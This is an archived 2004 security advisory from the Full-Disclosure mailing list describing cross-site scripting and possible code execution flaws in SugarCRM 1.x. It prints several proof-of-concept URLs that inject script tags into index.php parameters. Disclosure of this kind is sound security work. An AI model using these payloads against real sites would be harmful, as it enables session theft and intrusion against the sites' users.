lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <1104609524.17665.4.camel@nemobox> From: joxeankoret at yahoo.es (Joxean Koret) Subject: Cross Site Scripting Vulnerabilities and Possible Code Execution in SugarCRM ---------------------------------------------------------------------------- Cross Site Scripting Vulnerabilities and Possible Code Execution in SugarCRM ---------------------------------------------------------------------------- Author: Jose Antonio Coret (Joxean Koret) Date: 2004 Location: Basque Country --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SugarCRM 1.X - Manage leads, opportunities, contacts and more inside of a state-of-the-art user interface. Built on PHP and MySQL Web : http://sugarcrm.sourceforge.net --------------------------------------------------------------------------- Vulnerabilities: ~~~~~~~~~~~~~~~~ A. Cross Site Scripting Vulnerability A1. In the main script (index.php) various parameters, that are used to write the html code, not are verified. At least the following URLs are vulnerables to XSS (Cross Site Scripting) attacks : http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</script>&return_action=index http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.cookie)</script> http://<site-with-sugarcrm>/sugarcrm/index.php?name=%22%3E%3Cscript% 3Ealert%28document.cookie%29%3C%2Fscript% 3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Search And the following are XSS vulnerables and, may be, arbitrary PHP remote code execution vulnerables as well : http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=d676f046-1be5-dc36-114e-4138f972bf5d http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD ID]"><script>alert(document.cookie)</script> The fix: ~~~~~~~~ All problems are fixed in the latests versions availables at the sugarcrm site. Go to http://sugarcrm.sourceforge.net site for more info about the new versions. Disclaimer: ~~~~~~~~~~~ The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --------------------------------------------------------------------------- Contact: ~~~~~~~~ Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050101/b55e155d/attachment.bin
Powered by blists - more mailing lists